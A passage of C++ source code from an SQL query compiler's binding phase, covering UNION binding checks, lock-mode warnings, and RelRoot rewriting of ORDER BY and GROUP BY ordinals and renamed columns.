xtnmList2(bindWA->wHeap()); leftTable.getTableList(xtnmList1, &fmtdList1); rightTable.getTableList(xtnmList2, &fmtdList2); // Fix for Solution 10-070117-1834. // Error Message for -4161 - assumes that both sides // of the UNION is an embedded operation. For a // query such as, // select * from (delete from t709t1)as x union all (select * from t709t1) // the right side of the UNION is not an embedded operation. // Hence, changing the text for 4161 to a more generic one so // that all cases are covered in this one text message. *CmpCommon::diags() << DgSqlCode(-4161) << DgString0(fmtdList1) << DgString1(fmtdList2); bindWA->setErrStatus(); return this; } // QSTUFF // ++MV // Bind the alternateRightChildOrderExprTree expression. // ItemExpr *alternateRightChildOrderExprTree = removeAlternateRightChildOrderExprTree(); if (alternateRightChildOrderExprTree) { alternateRightChildOrderExprTree-> convertToValueIdList(alternateRightChildOrderExpr(), bindWA, ITM_ITEM_LIST); if (bindWA->errStatus()) { return NULL; } } // --MV // Bind the base class. // RelExpr *boundExpr = bindSelf(bindWA); if (bindWA->errStatus()) { delete resultTable; return boundExpr; } return boundExpr; } // Union::bindNode() // check for & warn against UNIONs that have inconsistent access/lock modes void Union::checkAccessLockModes() { Scan *left = child(0)->getAnyScanNode(); Scan *right = child(1)->getAnyScanNode(); if (!left || !right) return; // no-op. // UNION is user-specified as opposed to system-generated (eg, by // triggers/RI in GenericUpdate::inlinePipelineActions, etc) if (isSystemGenerated_) { return; } Lng32 lockFlagSession = CmpCommon::transMode()->getDP2LockFlags().getValue(); StmtLevelAccessOptions optionsLeft = left->accessOptions(); StmtLevelAccessOptions optionsRight = right->accessOptions(); Lng32 lockFlagLeft = lockFlagSession; Lng32 lockFlagRight = lockFlagSession; if (optionsLeft.userSpecified()) { lockFlagLeft = optionsLeft.getDP2LockFlags().getValue(); } if (optionsRight.userSpecified()) { lockFlagRight = optionsRight.getDP2LockFlags().getValue(); } if (lockFlagLeft != lockFlagRight) { *CmpCommon::diags() << DgSqlCode(3192) << DgString0(left->getTableName().getQualifiedNameAsString()) << DgString1(right->getTableName().getQualifiedNameAsString()); } } // Union::checkAccessLockModes() void Union::copyLeftRightListsToPreviousIF(Union * previousIF, BindWA * bindWA) { AssignmentStHostVars *thisLeftList = leftList(); AssignmentStHostVars *thisRightList = rightList(); // If the previous IF node does not have a left list, we copy the left and right // lists to that left list if (previousIF->currentChild() == 0 && !(previousIF->leftList())) { AssignmentStHostVars *leftListOfPreviousIF = previousIF->getCurrentList(bindWA); // Copy the leftList of this node to the left list of the previous IF leftListOfPreviousIF->addAllToListInIF(thisLeftList) ; // Copy the rightList of this node to the left list of the previous IF leftListOfPreviousIF->addAllToListInIF(thisRightList) ; } // If the previous IF node does not have a right list, we copy the left and right // lists to that left list if (previousIF->currentChild() == 1 && !(previousIF->rightList())) { AssignmentStHostVars *rightListOfPreviousIF = previousIF->getCurrentList(bindWA); // Copy the leftList of this node to the right list of the previous IF rightListOfPreviousIF->addAllToListInIF(thisLeftList) ; // Copy the rightList of this node to the right list of the previous IF rightListOfPreviousIF->addAllToListInIF(thisRightList) ; } } // Union::copyLeftRightListsToPreviousIF // ----------------------------------------------------------------------- // MV -- // A debugging method for dumping the columns in the RETDesc of both // children when they do not match. void Union::dumpChildrensRETDescs(const RETDesc& leftTable, const RETDesc& rightTable) { #ifndef NDEBUG // -- MVs. Debugging code !!!!! TBD fprintf(stdout, " # Left Right\n"); CollIndex maxIndex, minIndex; NABoolean leftIsBigger; if (leftTable.getDegree() > rightTable.getDegree()) { maxIndex = leftTable.getDegree(); minIndex = rightTable.getDegree(); leftIsBigger = TRUE; } else { maxIndex = rightTable.getDegree(); minIndex = leftTable.getDegree(); leftIsBigger = FALSE; } for (CollIndex i=0; i<minIndex; i++) { ColumnDesc *leftColDesc = leftTable.getColumnList()->at(i); ColumnDesc *rightColDesc = rightTable.getColumnList()->at(i); NAString leftCol (leftColDesc->getColRefNameObj().getColRefAsString()); NAString rightCol(rightColDesc->getColRefNameObj().getColRefAsString()); fprintf(stdout, " %3d %-55s %-55s \n", i, leftCol.data(), rightCol.data()); } if (leftIsBigger) { for (CollIndex j=minIndex; j<maxIndex; j++) { ColumnDesc *leftColDesc = leftTable.getColumnList()->at(j); NAString leftCol(leftColDesc->getColRefNameObj().getColRefAsString()); fprintf(stdout, " %3d %-35s\n", j, leftCol.data()); } } else { for (CollIndex k=minIndex; k<maxIndex; k++) { ColumnDesc *rightColDesc = rightTable.getColumnList()->at(k); NAString rightCol(rightColDesc->getColRefNameObj().getColRefAsString()); fprintf(stdout, " %3d %-35s \n", k, rightCol.data()); } } #endif } // ---------------------------------------------------------------------- // static helper functions for classes RelRoot and GroupByAgg // ---------------------------------------------------------------------- static NABoolean containsGenericUpdate(const RelExpr *re) { if (re->getOperator().match(REL_ANY_GEN_UPDATE)) return TRUE; for (Int32 i = 0; i < re->getArity(); ++i ) { if (re->child(i) && containsGenericUpdate(re->child(i))) return TRUE; } return FALSE; } static NABoolean containsUpdateOrDelete(const RelExpr *re) { if (re->getOperator().match(REL_ANY_UPDATE_DELETE)) return TRUE; for (Int32 i = 0; i < re->getArity(); ++i ) { if (re->child(i) && containsUpdateOrDelete(re->child(i))) return TRUE; } return FALSE; } // QSTUFF static GenericUpdate *getGenericUpdate(RelExpr *re) { if (re) { if (re->getOperatorType() == REL_UNARY_UPDATE || re->getOperatorType() == REL_UNARY_DELETE) return (GenericUpdate *)re; for (Int32 i = 0; i < re->getArity(); ++i) { // check all children (both sides) GenericUpdate *gu = getGenericUpdate(re->child(i)); if (gu) return gu; } } return NULL; } static NABoolean checkUnresolvedAggregates(BindWA *bindWA) { const ValueIdSet &aggs = bindWA->getCurrentScope()->getUnresolvedAggregates(); if (aggs.isEmpty()) return FALSE; // no error NAString unparsed(bindWA->wHeap()); for (ValueId vid = aggs.init(); aggs.next(vid); aggs.advance(vid)) { const ItemExpr *ie = vid.getItemExpr(); CMPASSERT(ie->isAnAggregate()); Aggregate *agg = (Aggregate *)ie; // Don't display COUNT() part of SUM()/COUNTxxx(), our implementation of AVG() // Display only the COUNT_NONULL() our implementation of VARIANCE and STDDEV // This is to avoid printing the aggregate functions more than once. if((agg->origOpType() != ITM_AVG || agg->getOperatorType() == ITM_SUM) && (!(agg->origOpType() == ITM_STDDEV || agg->origOpType() == ITM_VARIANCE) || agg->getOperatorType() == ITM_COUNT_NONULL)){ unparsed += ", "; if (agg->origOpType() == ITM_COUNT_STAR__ORIGINALLY) unparsed += "COUNT(*)"; else agg->unparse(unparsed, DEFAULT_PHASE, USER_FORMAT_DELUXE); } } unparsed.remove(0,2); // remove initial ", " // 4015 Aggregate functions placed incorrectly. *CmpCommon::diags() << DgSqlCode(-4015) << DgString0(unparsed); bindWA->setErrStatus(); return TRUE; } // checkUnresolvedAggregates() // ---------------------------------------------------------------------- // member functions for class RelRoot // ---------------------------------------------------------------------- static NABoolean isRenamedColInSelList(BindWA * bindWA, ItemExpr * col, ItemExprList &origSelectList, CollIndex &indx, RETDesc * childRETDesc) { if (col->getOperatorType() != ITM_REFERENCE) return FALSE; ColReference * havingColReference = (ColReference*)col; CollIndex j = 0; NABoolean found = FALSE; while (j < origSelectList.entries()) { ItemExpr * selectListEntry = origSelectList[j]; if (selectListEntry->getOperatorType() == ITM_RENAME_COL) { const ColRefName &selectListColRefName = *((RenameCol *)selectListEntry)->getNewColRefName(); if (havingColReference->getColRefNameObj() == selectListColRefName) { if (found) { // multiple entries with the same name. Error. *CmpCommon::diags() << DgSqlCode(-4195) << DgString0(selectListColRefName.getColName()); bindWA->setErrStatus(); return FALSE; } ColumnNameMap *baseColExpr = NULL; if (childRETDesc) baseColExpr = childRETDesc->findColumn(selectListColRefName); if ( NOT baseColExpr) { found = TRUE; indx = j; } } } // rename col j++; } // while return found; } static short replaceRenamedColInHavingWithSelIndex( BindWA * bindWA, ItemExpr * expr, ItemExprList &origSelectList, NABoolean &replaced, NABoolean &notAllowedWithSelIndexInHaving, RETDesc * childRETDesc) { if (((expr->getOperatorType() >= ITM_ROW_SUBQUERY) && (expr->getOperatorType() <= ITM_GREATER_EQ_ANY)) || ((expr->getOperatorType() >= ITM_AVG) && (expr->getOperatorType() <= ITM_VARIANCE)) || ((expr->getOperatorType() >= ITM_DIFF1) && (expr->getOperatorType() <= ITM_NOT_THIS))) { notAllowedWithSelIndexInHaving = TRUE; return 0; } for (Int32 i = 0; i < expr->getArity(); i++) { CollIndex j = 0; if (isRenamedColInSelList(bindWA, expr->child(i), origSelectList, j, childRETDesc)) { SelIndex * selIndex = new(bindWA->wHeap()) SelIndex(j+1); expr->setChild(i, selIndex); replaced = TRUE; } else if (bindWA->errStatus()) return -1; else if (replaceRenamedColInHavingWithSelIndex( bindWA, expr->child(i), origSelectList, replaced, notAllowedWithSelIndexInHaving, childRETDesc)) return -1; } return 0; } static short setValueIdForRenamedColsInHaving(BindWA * bindWA, ItemExpr * expr, ValueIdList &compExpr) { if (((expr->getOperatorType() >= ITM_ROW_SUBQUERY) && (expr->getOperatorType() <= ITM_GREATER_EQ_ANY)) || ((expr->getOperatorType() >= ITM_AVG) && (expr->getOperatorType() <= ITM_VARIANCE)) || ((expr->getOperatorType() >= ITM_DIFF1) && (expr->getOperatorType() <= ITM_NOT_THIS))) { return 0; } for (Int32 i = 0; i < expr->getArity(); i++) { if (expr->child(i)->getOperatorType() == ITM_SEL_INDEX) { SelIndex * si = (SelIndex*)expr->child(i)->castToItemExpr(); si->setValueId(compExpr[si->getSelIndex()-1]); } else setValueIdForRenamedColsInHaving(bindWA, expr->child(i), compExpr); } return 0; } // Method to update the selIndecies after we have gone through a // selectList expansion due to MVFs or Subqueries with degree > 1 // used to update the orderByTree // // Returns a list of SelIndecies that were updated. static void fixUpSelectIndecies(ItemExpr * expr, ValueIdSet &updatedIndecies, CollIndex idx, CollIndex offset) { if (expr == NULL ) return; for (Int32 i = 0; i < expr->getArity(); i++) { // Only update ones that we haven't already done. if ((expr->child(i)->getOperatorType() == ITM_SEL_INDEX) && !updatedIndecies.contains(expr->child(i)->getValueId())) { SelIndex * si = (SelIndex*)expr->child(i)->castToItemExpr(); if (si->getSelIndex() > idx) { si->setSelIndex(si->getSelIndex() + offset); updatedIndecies += si->getValueId(); } } else fixUpSelectIndecies(expr->child(i), updatedIndecies, idx, offset); } // Now check myself.. // Only update ones that we haven't already done. if ((expr->getOperatorType() == ITM_SEL_INDEX) && !updatedIndecies.contains(expr->getValueId())) { SelIndex * si = (SelIndex*)expr->castToItemExpr(); if (si->getSelIndex() > idx) { si->setSelIndex(si->getSelIndex() + offset); updatedIndecies += si->getValueId(); } } } // Method to update the selIndecies after we have gone through a // selectList expansion due to MVFs or Subqueries with degree > 1 // used to update the GroupByList // // Returns a list of SelIndecies that were updated. static void fixUpSelectIndeciesInSet(ValueIdSet & expr, ValueIdSet &updatedIndecies, CollIndex idx, CollIndex offset) { for (ValueId vid = expr.init(); expr.next(vid); expr.advance(vid)) { // Only update ones that we haven't already done. if (((ItemExpr *)vid.getItemExpr())->getOperatorType() == ITM_SEL_INDEX && !updatedIndecies.contains(vid)) { SelIndex * si = (SelIndex*) vid.getItemExpr(); if (si->getSelIndex() > idx) { si->setSelIndex(si->getSelIndex() + offset); updatedIndecies += si->getValueId(); } } } } RelRoot * RelRoot::transformOrderByWithExpr(BindWA *bindWA) { NABoolean specialMode = (CmpCommon::getDefault(MODE_SPECIAL_4) == DF_ON); if (NOT specialMode) return this; ItemExprList origSelectList(bindWA->wHeap()); ItemExprList origOrderByList(bindWA->wHeap()); CollIndex origSelectListCount ; if ((getCompExprTree() == NULL) && (child(0)->getOperatorType() != REL_GROUPBY)) { return this; } ItemExpr *orderByTree = getOrderByTree(); if (!orderByTree) return this; if (orderByTree) { origOrderByList.insertTree(orderByTree); } if (getCompExprTree()) origSelectList.insertTree(getCompExprTree()); else if (child(0)->getOperatorType() == REL_GROUPBY) { // this is the case: select distinct <expr> from t order by <expr> GroupByAgg * grby = (GroupByAgg *)(child(0)->castToRelExpr()); if (grby->child(0) && grby->child(0)->getOperatorType() == REL_ROOT) { RelRoot * selRoot = (RelRoot*)grby->child(0)->castToRelExpr(); if (selRoot->getCompExprTree()) origSelectList.insertTree(selRoot->getCompExprTree()); } } Lng32 selListCount = origSelectList.entries(); // if there is an expression in the order by list and this expression matches // a select list expression, then replace it with the index of that select list item. ItemExprList newOrderByList((Lng32)origOrderByList.entries(), bindWA->wHeap()); NABoolean orderByExprFound = FALSE; for (Lng32 i = 0; i < origOrderByList.entries(); i++) { ItemExpr * currOrderByItemExpr = origOrderByList[i]; NABoolean isDesc = FALSE; if (currOrderByItemExpr->getOperatorType() == ITM_INVERSE) { currOrderByItemExpr = currOrderByItemExpr->child(0)->castToItemExpr(); isDesc = TRUE; } if (NOT ((currOrderByItemExpr->getOperatorType() == ITM_SEL_INDEX) || (currOrderByItemExpr->getOperatorType() == ITM_REFERENCE) || (currOrderByItemExpr->getOperatorType() == ITM_CONSTANT))) { NABoolean found = FALSE; Lng32 selListIndex = 0; ItemExpr * selItem = NULL; while ((NOT found) && (selListIndex < selListCount)) { selItem = origSelectList[selListIndex]; found = currOrderByItemExpr->duplicateMatch(*selItem); if (NOT found) selListIndex++; } if (NOT found) { *CmpCommon::diags() << DgSqlCode(-4197) << DgString0("ORDER BY"); bindWA->setErrStatus(); return NULL; } selItem->setInOrderByOrdinal(TRUE); currOrderByItemExpr = new(bindWA->wHeap()) SelIndex(selListIndex+1); if (isDesc) { currOrderByItemExpr = new(bindWA->wHeap()) InverseOrder(currOrderByItemExpr); } orderByExprFound = TRUE; } // if order by expr newOrderByList.insert(currOrderByItemExpr); } if ((orderByExprFound) && (newOrderByList.entries() > 0)) { removeOrderByTree(); addOrderByTree(newOrderByList.convertToItemExpr()); } return this; } /////////////////////////////////////////////////////////////////////////// // // This methods performs the following in this order: // // If groupby name refers to a renamed col name in the select list, // replace group by entry with ordinal position of that sel list entry. // // If groupby ordinal exceeds the number of select list elements, // return error. // // If groupby ordinal referes to a '*', return error. // // If groupby ordinal refers to a column(ITM_REFERENCE) or a renamed // col name(ITM_RENAME_COL) whose child is a column(ITM_REFERENCE), // replace ordinal with actual col name. // // If there are ordinals in group by list, mark RelRoot indicating // phase2 transformation is needed. // // Mark all select list item exprs which are referened as an ordinal to // indicate that groupby check to validate grouping columns is not needed // for the subtree rooted below that select list item. // /////////////////////////////////////////////////////////////////////////// RelRoot * RelRoot::transformGroupByWithOrdinalPhase1(BindWA *bindWA) { NABoolean specialMode = ((CmpCommon::getDefault(MODE_SPECIAL_1) == DF_ON) || (CmpCommon::getDefault(MODE_SPECIAL_2) == DF_ON) || (CmpCommon::getDefault(MODE_SPECIAL_4) == DF_ON)); if ((CmpCommon::getDefault(GROUP_BY_USING_ORDINAL) == DF_OFF) && (NOT specialMode)) return this; // make sure child of root is a groupby node.or a sequence node // whose child is a group by node // And has groupby clause, if in specialMode if (child(0)->getOperatorType() != REL_GROUPBY && (child(0)->getOperatorType() != REL_SEQUENCE || (child(0)->child(0) && child(0)->child(0)->getOperatorType()!=REL_GROUPBY))) return this; NABoolean compExprTreeIsNull = FALSE; CollIndex origSelectListCount ; if (getCompExprTree() == NULL) { compExprTreeIsNull = TRUE; origSelectListCount = 0; // return this; } GroupByAgg * grby; if (child(0)->getOperatorType() == REL_GROUPBY) { grby = (GroupByAgg *)(child(0)->castToRelExpr()); } else {// sequence node above group by grby = (GroupByAgg *)(child(0)->child(0)->castToRelExpr()); } DCMPASSERT(grby != NULL); if ((NOT specialMode) && (grby->getGroupExprTree() == NULL)) return this; ItemExpr * groupExprTree = grby->getGroupExprTree(); ItemExprList origSelectList(bindWA->wHeap()); ItemExprList origGrbyList(bindWA->wHeap()); if (groupExprTree) { origGrbyList.insertTree(groupExprTree); } if (NOT compExprTreeIsNull) { origSelectList.insertTree(getCompExprTree()); origSelectListCount = origSelectList.entries(); } ItemExprList newGroupByList((Lng32)origGrbyList.entries(), bindWA->wHeap()); NABoolean foundSelIndex = FALSE; NABoolean lookForRenamedCols = TRUE; if ((CmpCommon::getDefault(GROUP_BY_USING_ORDINAL) != DF_ALL) && (NOT specialMode)) lookForRenamedCols = FALSE; NABoolean lookForExprInGroupByClause = TRUE; if (CmpCommon::getDefault(COMP_BOOL_92) == DF_ON) lookForExprInGroupByClause = FALSE; // See if UDF_SUBQ_IN_AGGS_AND_GBYS is enabled. It is enabled if the // default is ON, or if the default is SYSTEM and ALLOW_UDF is ON. NABoolean udfSubqInAggGrby_Enabled = FALSE; DefaultToken udfSubqTok = CmpCommon::getDefault(UDF_SUBQ_IN_AGGS_AND_GBYS); if ((udfSubqTok == DF_ON) || (udfSubqTok == DF_SYSTEM)) udfSubqInAggGrby_Enabled = TRUE; // This list will store duplicate expression specified in select list and // GroupBy clause. It helps with specifying select Index as well as // mark InGroupByOrdinal flag correctly (Gen Sol:10-100129-7836) NAList<CollIndex> listOfExpressions(CmpCommon::statementHeap()); for (CollIndex i = 0; (i < (CollIndex) origGrbyList.entries());i++) { ItemExpr * currGroupByItemExpr = ((ItemExpr *) origGrbyList[i])->castToItemExpr(); ItemExpr * newGroupByItemExpr = NULL; NABoolean selIndexError = FALSE; Int64 selIndex = -1; if (currGroupByItemExpr->getOperatorType() == ITM_CONSTANT) { ConstValue * cv = (ConstValue*)currGroupByItemExpr; if ((cv->canGetExactNumericValue()) && (cv->getType()->getScale() == 0)) { selIndex = cv->getExactNumericValue(); if ((selIndex >= 0) && (selIndex < MAX_COMSINT32)) { if (selIndex == 0 || selIndex > origSelectListCount) { // remember that this select index is in error. // Look for this constant in the select list. // If it is not found, then this const will be // treated as a select index and an error will // returned. If it is found in the select list, // then it will be treated as a group by expression. selIndexError = TRUE; } else currGroupByItemExpr = new(bindWA->wHeap()) SelIndex((Lng32)selIndex); } } } NABoolean found = FALSE; if ((currGroupByItemExpr->getOperatorType() != ITM_REFERENCE) && (currGroupByItemExpr->getOperatorType() != ITM_SEL_INDEX) && (lookForExprInGroupByClause)) { Int32 selListIndex = -1, lastMatch = -1; CollIndex j = 0; while ((NOT found) && (j < origSelectListCount)) { ItemExpr * selectListEntry = origSelectList[j]; if ((selectListEntry->getOperatorType() != ITM_REFERENCE) && ((selectListEntry->getOperatorType() != ITM_RENAME_COL) || ((selectListEntry->child(0)) && (selectListEntry->child(0)->getOperatorType() != ITM_REFERENCE)))) { ItemExpr * renameColEntry = NULL; if (selectListEntry->getOperatorType() == ITM_RENAME_COL) { renameColEntry = selectListEntry; selectListEntry = selectListEntry->child(0); } found = currGroupByItemExpr->duplicateMatch(*selectListEntry); if (found) { lastMatch = j; if(!listOfExpressions.contains(j)) { selListIndex = j; listOfExpressions.insert(j); selectListEntry->setInGroupByOrdinal(TRUE); if (renameColEntry) renameColEntry->setInGroupByOrdinal(TRUE); } else found = FALSE; } } j++; } // while if(lastMatch != -1) { found = TRUE; if(selListIndex == -1) selListIndex = lastMatch; if (bindWA->inViewDefinition()) currGroupByItemExpr = new(bindWA->wHeap()) SelIndex(selListIndex+1, currGroupByItemExpr); else currGroupByItemExpr = new(bindWA->wHeap()) SelIndex(selListIndex+1); } } // expr in group by clause if ((NOT found) && (selIndexError) && (selIndex > 0)) { // this const was not found in the select list and it was // not a valid select index. // Return an error. *CmpCommon::diags() << DgSqlCode(-4007) << DgInt0((Lng32)selIndex) << DgInt1((Lng32)origSelectList.entries()); bindWA->setErrStatus(); return NULL; } if (compExprTreeIsNull) return this; if (currGroupByItemExpr->getOperatorType() == ITM_SEL_INDEX) { SelIndex * si = (SelIndex*)currGroupByItemExpr; if (si->getSelIndex() > origSelectList.entries()) { *CmpCommon::diags() << DgSqlCode(-4007) << DgInt0((Lng32)si->getSelIndex()) << DgInt1((Lng32)origSelectList.entries()); bindWA->setErrStatus(); return NULL; } ItemExpr * selectListEntry = origSelectList[si->getSelIndex()-1]; if ((selectListEntry->getOperatorType() == ITM_RENAME_COL) && (selectListEntry->child(0)->getOperatorType() == ITM_REFERENCE)) { // make a copy of this entry's child newGroupByItemExpr = selectListEntry->child(0)-> castToItemExpr()->copyTopNode(NULL, bindWA->wHeap()); } else if (selectListEntry->getOperatorType() == ITM_REFERENCE) { if (((ColReference*)selectListEntry)-> getColRefNameObj().isStar()) { *CmpCommon::diags() << DgSqlCode(-4185) ; bindWA->setErrStatus(); return NULL; } // make a copy of this entry newGroupByItemExpr = selectListEntry->copyTopNode(NULL, bindWA->wHeap()); } else { selectListEntry->setInGroupByOrdinal(TRUE); newGroupByItemExpr = currGroupByItemExpr; } foundSelIndex = TRUE; } // group by ordinal else if (currGroupByItemExpr->getOperatorType() == ITM_REFERENCE) { ColReference * groupByColReference = (ColReference*)currGroupByItemExpr; // find out if this ColReference name is a renamed col in the // select list. if (lookForRenamedCols && groupByColReference->getCorrNameObj().getQualifiedNameObj().getObjectName().length() == 0) { NABoolean renamedColsInSelectList = FALSE; CollIndex j = 0; NABoolean found = FALSE; while (j < origSelectList.entries()) { ItemExpr * selectListEntry = origSelectList[j]; if (selectListEntry->getOperatorType() == ITM_RENAME_COL) { renamedColsInSelectList = TRUE; const ColRefName &selectListColRefName = *((RenameCol *)selectListEntry)->getNewColRefName(); if (groupByColReference->getColRefNameObj().getColName() == selectListColRefName.getColName()) { if (found) { // multiple entries with the same name. Error. *CmpCommon::diags() << DgSqlCode(-4195) << DgString0(selectListColRefName.getColName()); bindWA->setErrStatus(); return NULL; } foundSelIndex = TRUE; selectListEntry->setInGroupByOrdinal(TRUE); newGroupByItemExpr = new(bindWA->wHeap()) SelIndex(j+1); ((SelIndex *) newGroupByItemExpr)-> setRenamedColNameInGrbyClause(TRUE); found = TRUE; } } // rename col j++; } // while if ((NOT renamedColsInSelectList) && (j == origSelectList.entries())) lookForRenamedCols = FALSE; } // lookForRenamedCols if (! newGroupByItemExpr) newGroupByItemExpr = currGroupByItemExpr; } // else foundSelIndex else if ((currGroupByItemExpr->getOperatorType() == ITM_USER_DEF_FUNCTION) && (udfSubqInAggGrby_Enabled)) newGroupByItemExpr = currGroupByItemExpr; else if ((currGroupByItemExpr->getOperatorType() == ITM_ROW_SUBQUERY) && (udfSubqInAggGrby_Enabled)) newGroupByItemExpr = currGroupByItemExpr; else { *CmpCommon::diags() << DgSqlCode(-4197) << DgString0("GROUP BY"); bindWA->setErrStatus(); return NULL; } newGroupByList.insert(newGroupByItemExpr); } // for if ((foundSelIndex) && (newGroupByList.entries() > 0)) { grby->removeGroupExprTree(); grby->addGroupExprTree(newGroupByList.convertToItemExpr()); } if ((CmpCommon::getDefault(GROUP_BY_USING_ORDINAL) != DF_OFF) || (specialMode)) { grby->setParentRootSelectList(getCompExprTree()); } // if order by and group by are specified, check to see that // all columns specified in the order by clause are also present // in the group by clause. allOrderByRefsInGby_ = FALSE; if ((specialMode) && (getOrderByTree()) && (grby->getGroupExprTree() != NULL)) { ItemExpr *orderByTree = getOrderByTree(); ItemExprList orderByList(orderByTree, bindWA->wHeap()); ItemExprList groupByList(grby->getGroupExprTree(), bindWA->wHeap()); allOrderByRefsInGby_ = TRUE; for (CollIndex ii = 0; ii < orderByList.entries(); ii++) { ItemExpr * colRef = orderByList[ii]; if (colRef->getOperatorType() == ITM_INVERSE) colRef = colRef->child(0)->castToItemExpr(); if (colRef && colRef->getOperatorType() == ITM_REFERENCE) { ColReference * obyColRef = (ColReference*)colRef; NABoolean found = FALSE; for (CollIndex j = 0; j < groupByList.entries(); j++) { ItemExpr * gbyExpr = groupByList[j]; if (gbyExpr->getOperatorType() == ITM_REFERENCE) { ColReference * gbyColRef = (ColReference*)gbyExpr; if (obyColRef->getColRefNameObj().getColName() == gbyColRef->getColRefNameObj().getColName()) { found = TRUE; break; } } // if } // for if (NOT found) { allOrderByRefsInGby_ = FALSE; break; } } // if } // for } // if return this; } RelRoot * RelRoot::transformGroupByWithOrdinalPhase2(BindWA *bindWA) { NABoolean specialMode = ((CmpCommon::getDefault(MODE_SPECIAL_1) == DF_ON) || (CmpCommon::getDefault(MODE_SPECIAL_2) == DF_ON) || (CmpCommon::getDefault(MODE_SPECIAL_4) == DF_ON)); // make sure child of root is a groupby node.or a sequence node // whose child is a group by node if (child(0)->getOperatorType() != REL_GROUPBY && (child(0)->getOperatorType() != REL_SEQUENCE || (child(0)->child(0) && child(0)->child(0)->getOperatorType()!=REL_GROUPBY))) return this; GroupByAgg * grby; RelSequence * seqNode=NULL; if (child(0)->getOperatorType() == REL_GROUPBY ) { grby=(GroupByAgg *)(child(0)->castToRelExpr()); } else {//sequence node above group by grby=(GroupByAgg *)(child(0)->child(0)->castToRelExpr()); seqNode=(RelSequence *)(child(0)->castToRelExpr()); } DCMPASSERT(grby != NULL); ValueIdSet &groupExpr = grby->groupExpr(); // copy of groupExpr used to identify the changed // value ids ValueIdSet groupExprCpy(grby->groupExpr()); // When we encounter subqueries or MVFs in the select list // these gets expanded at bind time, and so the select index have to // be offset with the expansion number since the sel_index number // reflects the select list at parse time. for (ValueId vid = groupExpr.init(); groupExpr.next(vid); groupExpr.advance(vid)) { if (vid.getItemExpr()->getOperatorType() == ITM_SEL_INDEX) { CollIndex selIndexExpansionOffset = 0; SelIndex * si = (SelIndex*)(vid.getItemExpr()); ValueId grpById = compExpr()[si->getSelIndex() -1]; si->setValueId(grpById); if (child(0)->getOperatorType() != REL_SEQUENCE) { groupExprCpy.remove(vid); groupExprCpy.insert(grpById); } else { //sequence CMPASSERT(seqNode); const ValueIdSet seqCols = ((const RelSequence*)seqNode)->sequencedColumns(); ItemExpr * ie = grpById.getItemExpr(); ItemExpr::removeNotCoveredFromExprTree(ie,seqCols); //ie = ie->copyTree(bindWA->wHeap()); //ie = ie->bindNode(bindWA); if (bindWA->errStatus()) return NULL; groupExprCpy.remove(vid); groupExprCpy.insert(ie->getValueId()); ie = new (bindWA->wHeap()) NotCovered(ie); ie->synthTypeAndValueId(); compExpr()[si->getSelIndex()-1] = ie->getValueId(); seqNode->addSequencedColumn(ie->getValueId()); } switch (grpById.getItemExpr()->getOperatorType()) { case ITM_VALUEID_PROXY: { ValueId derivedId = (( ValueIdProxy *)(grpById.getItemExpr()))->isDerivedFrom(); // If this is not the ValueIdProxy that represents the MVF or Subq // skip the expansion. if ((( ValueIdProxy *)(grpById.getItemExpr()))-> needToTransformChild() != TRUE) break; ValueIdList outputs; switch (derivedId.getItemExpr()->getOperatorType()) { case ITM_USER_DEF_FUNCTION: { // When we reference a UDF in the groupBy clause, // if the UDF is a MVF(has multiple outputs), we need to add // the other elements from the MVF's outputs. // These elements have already been expanded into the // select list, so all we need to do is to add them to the // groupby expression. // By default, we associate the valueId of the MVF with // its first output, so we just need to copy the rest of the // outputs. UDFunction *udf = (UDFunction *) derivedId.getItemExpr(); const RoutineDesc *rDesc = udf->getRoutineDesc(); outputs = rDesc->getOutputColumnList(); break; } case ITM_ROW_SUBQUERY: { // When we reference a subquery in the groupBy clause, // if the subquery has a degree > 1, we need to add the other // elements from the subquery's select list. Subquery *subq = (Subquery *) derivedId.getItemExpr(); RelRoot *subqRoot = (RelRoot *) subq->getSubquery(); outputs = subqRoot->compExpr(); break; } default: CMPASSERT(0); // we don't support anything else } // Add in the other outputs from the MVF/Subquery for (CollIndex i=1; i < outputs.entries(); i++) { selIndexExpansionOffset ++; groupExprCpy.insert(outputs[i]); } // Need to check the groupBy and orderBy lists // for selIndexes with an index greater than this one, // If we find one, bump its index into the select list by // the expansion. ValueIdSet fixedUpIndecies; fixUpSelectIndeciesInSet(grby->groupExpr(),fixedUpIndecies, si->getSelIndex(), selIndexExpansionOffset); fixUpSelectIndecies(getOrderByTree(), fixedUpIndecies, si->getSelIndex(), selIndexExpansionOffset); break; } } // Now that we have swapped the vid list from grouping // expression to the corresponding one from select list // go thru each expression, collect the base columns // and mark each column as referenced for histogram. // Since this is only for group by, we will get only single // interval histograms - 10-081015-6557 ValueIdSet columns; grpById.getItemExpr()->findAll(ITM_BASECOLUMN, columns, TRUE, TRUE); for (ValueId id = columns.init(); columns.next(id); columns.advance(id)) { NAColumn *nacol = id.getNAColumn(); if (nacol->isReferencedForHistogram()) continue; nacol->setReferencedForSingleIntHist(); } } // found Sel Index } // recreate the groupExpr expression after updating the value ids grby->setGroupExpr (groupExprCpy); if (((CmpCommon::getDefault(GROUP_BY_USING_ORDINAL) != DF_OFF) || (specialMode)) && (grby->selPredTree()) && (grby->selIndexInHaving())) { setValueIdForRenamedColsInHaving(bindWA, grby->selPredTree(), compExpr()); BindScope *currScope = bindWA->getCurrentScope(); ItemExpr *havingPred = grby->removeSelPredTree(); currScope->context()->inHavingClause() = TRUE; havingPred->convertToValueIdSet(grby->selectionPred(), bindWA, ITM_AND); currScope->context()->inHavingClause() = FALSE; if (bindWA->errStatus()) return this; } if (orderByTree_ && seqNode && grby) { ItemExprList origOrderByList(bindWA->wHeap()); origOrderByList.insertTree(orderByTree_); ItemExprList newOrderByList((Lng32)origOrderByList.entries(), bindWA->wHeap()); for (CollIndex i = 0; (i < (CollIndex) origOrderByList.entries());i++) { ItemExpr * currOrderByItemExpr = ((ItemExpr *) origOrderByList[i])->castToItemExpr(); ItemExpr * newOrderByItemExpr = currOrderByItemExpr; if (currOrderByItemExpr->getOperatorType() == ITM_SEL_INDEX) { SelIndex * si = (SelIndex*)(currOrderByItemExpr); if (compExpr()[si->getSelIndex()-1].getItemExpr()->getOperatorType() != ITM_BASECOLUMN) { newOrderByItemExpr = compExpr()[si->getSelIndex()-1].getItemExpr(); } } newOrderByList.insert(newOrderByItemExpr); } orderByTree_ = newOrderByList.convertToItemExpr(); } return this; } void RelRoot::transformTDPartitionOrdinals(BindWA *bindWA) { if(!getHasTDFunctions()) return ; if (getCompExprTree() == NULL) return ; BindScope *currScope = bindWA->getCurrentScope(); RelExpr * realChildNode = NULL; if (child(0)->getOperatorType() 